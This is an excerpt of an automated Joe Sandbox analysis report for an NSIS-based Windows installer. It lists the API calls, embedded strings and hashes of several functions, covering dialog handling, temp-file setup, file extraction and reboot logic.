SendMessageW.USER32(?,00001024,00000000,?), ref: 00405204
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405226
ShowWindow.USER32(?,00000008), ref: 0040523A
GetDlgItem.USER32(?,000003EC), ref: 0040525B
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040526B
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405280
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 0040528C
GetDlgItem.USER32(?,000003F8), ref: 0040514D

Part of subcall function 00403D98: SendMessageW.USER32(00000028,?,00000001,004057B4), ref: 00403DA6

Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

GetDlgItem.USER32(?,000003EC), ref: 004052AB
CreateThread.KERNELBASE(00000000,00000000,Function_00005047,00000000), ref: 004052B9
CloseHandle.KERNELBASE(00000000), ref: 004052C0
ShowWindow.USER32(00000000), ref: 004052E7
ShowWindow.USER32(?,00000008), ref: 004052EC
ShowWindow.USER32(00000008), ref: 00405333
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405365
CreatePopupMenu.USER32 ref: 00405376
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 0040538B
GetWindowRect.USER32(?,?), ref: 0040539E
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053C0
SendMessageW.USER32(?,00001073,00000000,?), ref: 004053FB
OpenClipboard.USER32(00000000), ref: 0040540B
EmptyClipboard.USER32 ref: 00405411
GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 0040541D
GlobalLock.KERNEL32(00000000), ref: 00405427
SendMessageW.USER32(?,00001073,00000000,?), ref: 0040543B
GlobalUnlock.KERNEL32(00000000), ref: 0040545D
SetClipboardData.USER32(0000000D,00000000), ref: 00405468
CloseClipboard.USER32 ref: 0040546E

Strings

New install of "%s" to "%s", xrefs: 00405182
@rD, xrefs: 004053D7
{, xrefs: 00405352

Memory Dump Source

Source File: 00000000.00000002.1702675682.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702660135.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702690577.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702914582.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_M13W1o3scc.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
String ID: @rD$New install of "%s" to "%s"${
API String ID: 2110491804-2409696222
Opcode ID: f168db28b2c12902a58862b60cbdcc3c6e49ead995c60d9878de2ccec3fe74d8
Instruction ID: 480b9f2609884c7685ddca5963e0cfcc77f9e358d06567921943d8ab7e89b76b
Opcode Fuzzy Hash: f168db28b2c12902a58862b60cbdcc3c6e49ead995c60d9878de2ccec3fe74d8
Instruction Fuzzy Hash: 14B15B70800608FFDB11AFA0DD85EAE7B79EF44355F00803AFA45BA1A0CBB49A519F59

Function 00403883 Relevance: 54.6, APIs: 22, Strings: 9, Instructions: 304
filestringcomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

#17.COMCTL32 ref: 004038A2
SetErrorMode.KERNELBASE(00008001), ref: 004038AD
OleInitialize.OLE32(00000000), ref: 004038B4

Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327

SHGetFileInfoW.SHELL32(00409264,00000000,?,000002B4,00000000), ref: 004038DC

Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016

GetCommandLineW.KERNEL32(0046ADC0,NSIS Error), ref: 004038F1
GetModuleHandleW.KERNEL32(00000000,004C30A0,00000000), ref: 00403904
CharNextW.USER32(00000000,004C30A0,00000020), ref: 0040392B
GetTempPathW.KERNEL32(00002004,004D70C8,00000000,00000020), ref: 00403A00
GetWindowsDirectoryW.KERNEL32(004D70C8,00001FFF), ref: 00403A15
lstrcatW.KERNEL32(004D70C8,\Temp), ref: 00403A21
DeleteFileW.KERNELBASE(004D30C0), ref: 00403A38
CoUninitialize.COMBASE(?), ref: 00403AD1
ExitProcess.KERNEL32 ref: 00403AF1
lstrcatW.KERNEL32(004D70C8,~nsu.tmp), ref: 00403AFD
lstrcmpiW.KERNEL32(004D70C8,004CF0B8,004D70C8,~nsu.tmp), ref: 00403B09
CreateDirectoryW.KERNEL32(004D70C8,00000000), ref: 00403B15
SetCurrentDirectoryW.KERNEL32(004D70C8), ref: 00403B1C
DeleteFileW.KERNEL32(004331E8,004331E8,?,00477008,00409204,00473000,?), ref: 00403B6D
CopyFileW.KERNEL32(004DF0D8,004331E8,00000001), ref: 00403B81
CloseHandle.KERNEL32(00000000,004331E8,004331E8,?,004331E8,00000000), ref: 00403BAE
GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C04
ExitWindowsEx.USER32(00000002,00000000), ref: 00403C40

Strings

SeShutdownPrivilege, xrefs: 00403C16
Error launching installer, xrefs: 00403A7D
\Temp, xrefs: 00403A1B
~nsu.tmp, xrefs: 00403AF7
NSIS Error, xrefs: 004038E2
NCRC, xrefs: 0040397C
1C, xrefs: 00403B56
/D=, xrefs: 004039A6
_?=, xrefs: 00403A64

Memory Dump Source

Source File: 00000000.00000002.1702675682.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702660135.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702690577.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702914582.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_M13W1o3scc.jbxd

Similarity

API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp$1C
API String ID: 2435955865-239407132
Opcode ID: b4c90e19bc4a522d6528af1b5983b0f211df9e73c6af6eb8e5ff34ebe7c06cb6
Instruction ID: 7cf1fa831aca86d96b8495533088dbe4cf0b0326274ef0a42366eb07f7c747b9
Opcode Fuzzy Hash: b4c90e19bc4a522d6528af1b5983b0f211df9e73c6af6eb8e5ff34ebe7c06cb6
Instruction Fuzzy Hash: C4A1B671544305BAD6207F629D4AF1B3EACAF0070AF15483FF585B61D2DBBC8A448B6E

Function 004074BB Relevance: 5.4, APIs: 4, Instructions: 382
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1702675682.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702660135.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702690577.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702914582.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_M13W1o3scc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
Instruction ID: b44593247c4c050b0e646bb53675e7b1a8962b0b92449cff70e8ee1879f4dc4f
Opcode Fuzzy Hash: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
Instruction Fuzzy Hash: 00F14871908249DBDF18CF28C8946E93BB1FF44345F14852AFD5A9B281D338E986DF86

Function 004062FC Relevance: 4.5, APIs: 3, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
GetProcAddress.KERNEL32(00000000), ref: 00406327

Memory Dump Source

Source File: 00000000.00000002.1702675682.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702660135.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702690577.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702914582.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_M13W1o3scc.jbxd

Similarity

API ID: AddressHandleLibraryLoadModuleProc
String ID:
API String ID: 310444273-0
Opcode ID: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
Instruction ID: 23f85fcbdf3119ad7ff9d94b99dcad510d7c567b01d836bd9cab37df641e0753
Opcode Fuzzy Hash: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
Instruction Fuzzy Hash: 53D0123120010597C6001B65AE0895F776CEF95611707803EF542F3132EB34D415AAEC

Function 004062D5 Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
FindClose.KERNEL32(00000000), ref: 004062EC

Memory Dump Source

Source File: 00000000.00000002.1702675682.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702660135.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702690577.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702914582.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_M13W1o3scc.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
Instruction ID: 3dd5e1b78c12f0f437ff376ab6b0e1f90f8becb0d3509d6a9a7f52ed6ae53baf
Opcode Fuzzy Hash: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
Instruction Fuzzy Hash: 7AD0C9315041205BC25127386E0889B6A589F163723258A7AB5A6E11E0CB388C2296A8

Function 00405479 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054B5
ShowWindow.USER32(?), ref: 004054D2
DestroyWindow.USER32 ref: 004054E6
SetWindowLongW.USER32(?,00000000,00000000), ref: 00405502
GetDlgItem.USER32(?,?), ref: 00405523
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405537
IsWindowEnabled.USER32(00000000), ref: 0040553E
GetDlgItem.USER32(?,00000001), ref: 004055ED
GetDlgItem.USER32(?,00000002), ref: 004055F7
SetClassLongW.USER32(?,000000F2,?), ref: 00405611
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00405662
GetDlgItem.USER32(?,00000003), ref: 00405708
ShowWindow.USER32(00000000,?), ref: 0040572A
KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040573C
EnableWindow.USER32(?,?), ref: 00405757
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040576D
EnableMenuItem.USER32(00000000), ref: 00405774
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040578C
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040579F
lstrlenW.KERNEL32(00447240,?,00447240,0046ADC0), ref: 004057C8
SetWindowTextW.USER32(?,00447240), ref: 004057DC
ShowWindow.USER32(?,0000000A), ref: 00405910

Strings

@rD, xrefs: 004057B9

Memory Dump Source

Source File: 00000000.00000002.1702675682.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702660135.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702690577.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702914582.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_M13W1o3scc.jbxd

Similarity

API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID: @rD
API String ID: 3282139019-3814967855
Opcode ID: 892c705fd8619986465a6960d4e81f7d1e8168c1c52714a2b5abc7a1d7472251
Instruction ID: 0f9b988f21b44e482dc064b3562f20aa73efc2902ac8c6ffeb9ddf27563d0ddb
Opcode Fuzzy Hash: 892c705fd8619986465a6960d4e81f7d1e8168c1c52714a2b5abc7a1d7472251
Instruction Fuzzy Hash: D8C1C371500A04EBDB216F61EE49E2B3BA9EB45345F00093EF551B12F0DB799891EF2E

Function 004015A0 Relevance: 56.4, APIs: 15, Strings: 17, Instructions: 351
sleepfilewindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostQuitMessage.USER32(00000000), ref: 00401648
Sleep.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 004016B2
SetForegroundWindow.USER32(?), ref: 004016CB
ShowWindow.USER32(?), ref: 00401753
ShowWindow.USER32(?), ref: 00401767
SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
SetCurrentDirectoryW.KERNELBASE(?,004CB0B0,?,000000E6,0040F0D0,?,?,?,000000F0,?,000000F0), ref: 00401885
MoveFileW.KERNEL32(00000000,?), ref: 00401908
GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,0040F0D0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE

Strings

BringToFront, xrefs: 004016BD
Rename on reboot: %s, xrefs: 00401943
Sleep(%d), xrefs: 0040169D
Jump: %d, xrefs: 00401602
CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
Aborting: "%s", xrefs: 0040161D
Rename failed: %s, xrefs: 0040194B
CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
Rename: %s, xrefs: 004018F8
SetFileAttributes failed., xrefs: 004017A1
SetFileAttributes: "%s":%08X, xrefs: 0040177B
IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
CreateDirectory: "%s" (%d), xrefs: 004017BF
Call: %d, xrefs: 0040165A
CreateDirectory: "%s" created, xrefs: 00401849
detailprint: %s, xrefs: 00401679

Memory Dump Source

Source File: 00000000.00000002.1702675682.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702660135.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702690577.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702914582.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_M13W1o3scc.jbxd

Similarity

API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
API String ID: 2872004960-3619442763
Opcode ID: e7226c198396c3fe3a7f3bea8c4d52a2e846d2bb9e79691e18455936b93e1c7d
Instruction ID: b6b48939bc8a7188504c618ab7841b31fdd5898bf24c808f75461ec369738802
Opcode Fuzzy Hash: e7226c198396c3fe3a7f3bea8c4d52a2e846d2bb9e79691e18455936b93e1c7d
Instruction Fuzzy Hash: 0AB1F471A00204ABDB10BF61DD46DAE3B69EF44314B21817FF946B21E1DA7D4E40CAAE

Function 0040592C Relevance: 45.7, APIs: 15, Strings: 11, Instructions: 233
stringregistrylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327

lstrcatW.KERNEL32(004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006,004C30A0,-00000002,00000000,004D70C8,00403AC1,?), ref: 004059AE
lstrlenW.KERNEL32(00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006,004C30A0), ref: 00405A30
lstrcmpiW.KERNEL32(00462538,.exe,00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000), ref: 00405A43
GetFileAttributesW.KERNEL32(00462540), ref: 00405A4E

Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E

LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004C70A8), ref: 00405AB7
RegisterClassW.USER32(0046AD60), ref: 00405B0A
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B22
CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B5B

Part of subcall function 00403E95: SetWindowTextW.USER32(00000000,0046ADC0), ref: 00403F30

ShowWindow.USER32(00000005,00000000), ref: 00405B91
LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BA2
LoadLibraryW.KERNEL32(RichEd32), ref: 00405BAD
GetClassInfoW.USER32(00000000,RichEdit20A,0046AD60), ref: 00405BBD
GetClassInfoW.USER32(00000000,RichEdit,0046AD60), ref: 00405BCA
RegisterClassW.USER32(0046AD60), ref: 00405BD3
DialogBoxParamW.USER32(?,00000000,00405479,00000000), ref: 00405BF2

Strings

RichEd20, xrefs: 00405B9D
.DEFAULT\Control Panel\International, xrefs: 00405999
B%F, xrefs: 00405A1F
.exe, xrefs: 00405A3D
Control Panel\Desktop\ResourceLocale, xrefs: 00405972
_Nb, xrefs: 00405AD1
@rD, xrefs: 00405965
RichEd32, xrefs: 00405BA8
RichEdit, xrefs: 00405BC4
RichEdit20A, xrefs: 00405BB6, 00405BBB
@%F, xrefs: 004059F6

Memory Dump Source

Source File: 00000000.00000002.1702675682.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702660135.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702690577.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702914582.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_M13W1o3scc.jbxd

Similarity

API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
String ID: .DEFAULT\Control Panel\International$.exe$@%F$@rD$B%F$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
API String ID: 608394941-1650083594
Opcode ID: 18be7924d3bcca259bbbf180237d25193f30e5c9112311b2c349bb590eb249de
Instruction ID: 271ce27004ef92612bfc9362a6cc74883a37054a4c8cca7c49d128c059fded9a
Opcode Fuzzy Hash: 18be7924d3bcca259bbbf180237d25193f30e5c9112311b2c349bb590eb249de
Instruction Fuzzy Hash: 5E71A370604B04AED721AB65EE85F2736ACEB44749F00053FF945B22E2D7B89D418F6E

Function 00401A1F Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 185
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

lstrcatW.KERNEL32(00000000,00000000,LoggingRise,004CB0B0,00000000,00000000), ref: 00401A76
CompareFileTime.KERNEL32(-00000014,?,LoggingRise,LoggingRise,00000000,00000000,LoggingRise,004CB0B0,00000000,00000000), ref: 00401AA0

Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016

Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D

Strings

File: overwriteflag=%d, allowskipfilesflag=%d, name="%s", xrefs: 00401A39
File: error, user retry, xrefs: 00401B40
File: error creating "%s", xrefs: 00401AF0
File: error, user cancel, xrefs: 00401B93
File: wrote %d to "%s", xrefs: 00401BD0
File: error, user abort, xrefs: 00401B53
LoggingRise, xrefs: 00401A53, 00401A5C, 00401A69, 00401A7B, 00401A8C, 00401AC2, 00401AD8, 00401AEF, 00401B07, 00401B5E, 00401B80, 00401BCE, 00401C10, 00401C19, 00401C23, 00401C29, 00401C3B
File: skipped: "%s" (overwriteflag=%d), xrefs: 00401B81

Memory Dump Source

Source File: 00000000.00000002.1702675682.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702660135.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702690577.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702914582.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_M13W1o3scc.jbxd

Similarity

API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
String ID: File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"$LoggingRise
API String ID: 4286501637-3192957805
Opcode ID: b6a2df31382c61c88927ef82d5f6ae0aba2303a4f2552ab8741c3bf9876e390d
Instruction ID: fe683e2e252f9e2189d7cf48164ff2fe6631720e8c40e43e96375682ff159270
Opcode Fuzzy Hash: b6a2df31382c61c88927ef82d5f6ae0aba2303a4f2552ab8741c3bf9876e390d
Instruction Fuzzy Hash: 9D510871901114BADF10BBB1CD46EAE3A68DF05369F21413FF416B10D2EB7C5A518AAE

Function 00403587 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 182
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00403598
GetModuleFileNameW.KERNEL32(00000000,004DF0D8,00002004,?,?,?,00000000,00403A47,?), ref: 004035B4

Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76

GetFileSize.KERNEL32(00000000,00000000,004E30E0,00000000,004CF0B8,004CF0B8,004DF0D8,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00403600

Strings

Null, xrefs: 0040367E
Error launching installer, xrefs: 004035D7
Inst, xrefs: 0040366C
soft, xrefs: 00403675
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037C5

Memory Dump Source

Source File: 00000000.00000002.1702675682.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702660135.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702690577.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702739833.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702914582.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_M13W1o3scc.jbxd

Similarity

API ID: File$AttributesCountCreateModuleNameSizeTick
